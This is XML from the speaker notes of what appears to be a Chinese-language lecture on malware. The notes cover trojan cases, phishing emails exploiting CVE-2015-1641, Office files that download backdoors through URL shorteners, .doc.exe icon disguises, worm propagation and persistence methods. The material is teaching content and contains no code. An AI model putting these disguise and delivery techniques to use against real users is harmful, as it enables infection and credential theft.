          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12441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404759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曾经（好像是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>年）攻击工商银行的案例：攻击者在工商银行的营业网点的公共计算机上下载自己提前放在互联网上的木马，窃取</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用营业网点计算机进行网银操作的用户的用户名和密码。后来，案件发生后，所有银行网点的计算机只能上指定的网站。</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44</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0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>由于此种攻击借助了目标团体所信任的网站，攻击成功率很高，即便是那些对</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>鱼叉攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>或其他形式的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>钓鱼攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>具有防护能力的团体</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50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4875959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https://www.secrss.com/articles/18236</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51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30145297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zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>图示的是一个传播木马的钓鱼邮件，针对的是中国军事爱好者。邮件正文中嵌入了一个链接，指向一个包含恶意代码的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WORD</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>文档。当用户打开文档时，恶意代码利用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>CVE-2015-1641</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>漏洞控制用户计算机。</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54</a:t>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55</a:t>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https://mp.weixin.qq.com/s/HLnr6-vSU1QzWSKP0y_y2g</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>以订单作为社交工程的手段，诱骗受害者开启恶意文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>这种连外开文件的恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Office</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>文件样本，多半以</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>docx</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>的方式夹在电子邮件的附件中，少数用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xls</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ppam</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>的方式做夹带。连外下载超链接会透过短网址，如：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xy2.eu</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bit.ly</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linkzip.me</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bit.do</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u.nu</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is.gd</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>或其他经过编码的网址藏身；下载的恶意文件则多为 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>wbk</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(Microsoft Word</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>备份</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>)</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.wiz(Microsoft Wizard File)</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.dot(Microsoft Word</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>范本</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.doc</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>，虽然有些类型的文档不常见，但只要计算机安装</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Microsoft Office</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>相关的软件，就能开启这些恶意文件并执行。恶意文件被执行后，会向中继主机抓取</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>vbc.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>reg.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>并执行，接着成为常驻的后门程序。</a:t>
            </a:r>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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38278913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CNCERT 2019</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>年度互联网安全报告</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://www.cert.org.cn/publish/main/upload/File/2019Annual%20report.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36982863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还有一种更具迷惑性的图标伪装：图标还是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的图标，但文件名改为：南方周末采访提纲</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.doc.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（在创建这个可执行文件时，提供并指定文件的图标为常见的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件图标），有些文件浏览器在显示文件信息时，只显示文件名（此处就是：南方周末采访提纲</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.doc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>），用户稍不注意还真以为是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文档，想双击用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>打开，结果却执行了木马。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>很多集成开发环境，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Visual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t> Studio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t>，在编译生成可执行文件时，均可指定文件的图标文件（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" err="1"/>
              <a:t>ico</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t>），如何不指定，则用默认的文件类型图标。</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61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3480550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zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>蠕虫的攻击过程是对一般网络攻击过程的自动化实现，以上模块中的前</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>个构成了蠕虫的自动入侵功能，其中最关键的一步就是网络安全漏洞（主要是缓冲区溢出漏洞）使代码在远程系统上自动运行，这一点也是蠕虫与病毒、木马的本质区别，漏洞攻击也体现了蠕虫的漏洞依赖性。因此修补安全漏洞或关闭相关网络端口即可防止相应蠕虫侵入。</a:t>
            </a:r>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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39944873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64</a:t>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66</a:t>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https://www.secrss.com/articles/29619</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>https://c212.net/c/link/?t=0&amp;l=en&amp;o=3076717-1&amp;h=3813729624&amp;u=https%3A%2F%2Fwww.netskope.com%2Fnetskope-threat-labs%2Fcloud-threat-report&amp;a=here</a:t>
            </a:r>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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37978686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8BFBA5-37C9-4B2F-A3D7-0B710D96EB5B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1244162" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12441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8268733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t>这种方法比较古老。</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75</a:t>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t>服务程序是一类长期运行的应用程序，它不需要界面或可视化输出，能够设置为在操作系统启动时自动开始运行，而不需要用户登录来运行它。</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79</a:t>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81</a:t>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https://paper.seebug.org/1464</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://mp.weixin.qq.com/s/ktGug1VbSpmzh9CEGKbbdw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这个链接详细介绍了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>计划任务的原理</a:t>
            </a:r>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83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21835677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err="1"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击，让管理员重启机器</a:t>
            </a:r>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89</a:t>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8BFBA5-37C9-4B2F-A3D7-0B710D96EB5B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1244162" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12441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1010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现在基本上都是混合型</a:t>
            </a:r>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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
